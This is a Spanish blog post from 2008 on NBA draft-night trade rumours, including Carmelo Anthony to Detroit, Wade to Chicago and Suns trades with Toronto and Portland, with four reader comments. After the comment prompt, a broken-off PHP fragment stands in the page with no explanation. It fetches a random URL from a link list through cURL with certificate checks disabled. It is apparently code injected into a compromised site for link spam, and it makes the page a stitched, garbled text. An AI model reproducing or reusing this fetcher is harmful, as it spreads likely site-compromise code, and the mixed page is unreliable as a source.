Rumorología variada

23 de June de 2008 por txusma

El draft de la NBA se acerca y con él cantidades ingentes de rumores, muchos de ellos afectando a jugadores importantes.

Aunque Denver siga negando el posible traspaso de Carmelo Anthony la verdad es que los rumores arrecian. El último le situaba en Detroit a cambio de Chauncey Billups y Tayshaun Prince, lo que ha provocado una reunión entre la directiva y los agentes del jugador que buscan una confirmación oficial de que no lo traspasarán. De momento esta confirmación no ha llegado por lo que no se descarta su marcha. La situación salarial de Denver no es muy boyante y aún tienen que hacer frente a la renovación de JR Smith.

La situación de Dwyane Wade tampoco es todo lo estable que él desearía y es que vuelve a sonar con fuerza la posibilidad que recale en los Bulls a cambio del número 1 del draft, Tyrus Thomas y Larry Hughes. De esta manera los Heat contarían presumiblemente con la fenomenal pareja Derrick Rose – Michael Beasley, aunque también se ha comentado que los Heat en quien realmente están interesados es en OJ Mayo, por lo que tampoco es descartable que intenten bajar una o dos posiciones para seguir optando a Mayo y además conseguir alguna segunda ronda. Minnessota Timberwolves podrían estar firmemente interesados.

Hay fuentes que indican que es muy probable que los Phoenix Suns lleven a cabo algun traspaso la noche del draft. Parece ser que están en conversaciones con Toronto para conseguir a TJ Ford y el pick 17 a cambio de Boris Diaw. Ford, que se convertiría en el suplente de Steve Nash, ya jugó a las órdenes de Terry Porter en Milwaukee hace unas temporadas. Otra opción que barajan los Suns es traspasar a Leandro Barbosa a los Blazers a cambio de Martell Webster y su elección número 13. Y es que los Blazers parecen estar interesados en vender su ronda a cambio de jugadores más veteranos, como por ejemplo, el alero Mike Miller.

Y aún queda por decidirse el futuro de muchos jugadores como Elton Brand, Shawn Marion (que todo indica que se quedará en Miami pero no se descarta un sign&trade precisamente por Brand), Josh Smith (al que los Sixers siguen muy de cerca), Lamar Odom, Michael Redd (que suena para Cleveland) o Josh Howard. Seguiremos atentos.

Comenta

4 comentarios a esta entrada

  1. Dantley dice:
    #1

    La verdad es que se prevén muchos movimientos el día del draft. Me intriga lo que pueda hacer Portland con tanto que ofrecer.

      Citar

  2. Viva_Dirk dice:
    #2

    Portland si se mueve este año y da alguna buena pieza creo que se equivoca. Lo tiene todo perfecto para el siguiente verano y este año tiene la incorporación de Oden y ese Nº13.

    Conseguir a Mike Miller a cambio de Travis Outlaw y ese Nº13 podria ser un movimiento interesante, pero no lo veo del todo claro.

      Citar

  3. Dantley dice:
    #3

    Oden, el 13 y Rudy

      Citar

  4. Viva_Dirk dice:
    #4

    Cierrrrrrto, se me olvidaba Rudy. Pues mas aun, con esos refuerzos y el hueco que tienen el verano de 2009, yo no me gastaba ni la mid-level.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>